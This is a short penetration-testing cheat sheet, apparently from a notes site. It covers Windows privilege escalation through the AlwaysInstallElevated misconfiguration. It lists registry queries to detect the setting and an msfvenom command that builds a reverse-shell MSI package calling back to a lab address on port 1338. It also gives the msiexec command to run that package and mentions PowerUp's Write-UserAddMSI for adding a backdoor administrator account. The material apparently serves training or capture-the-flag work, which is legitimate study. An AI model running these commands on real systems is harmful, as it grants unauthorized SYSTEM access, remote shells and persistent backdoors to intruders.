AlwaysInstallElevated

Overview

AlwaysInstallElevated is a misconfiguration that installs all msi packages as system. Wheels spinning?

Elevation via AlwaysInstallElevated

Query the registry for the misconfiguration

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
The machine is vulnerable if both values are set to 1

Create a malicious msi file

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1338 -f msi -o rev.msi

Pop a shell

msiexec /i rev.msi

Quick Win

You can get a quick win by using the Write-UserAddMSI function from PowerUp.

This function will add a backdoor user to the Local Administrators Group

An RDP sessions is required for this

PreviousAutoRunsNextRegsvc ACL

Last updated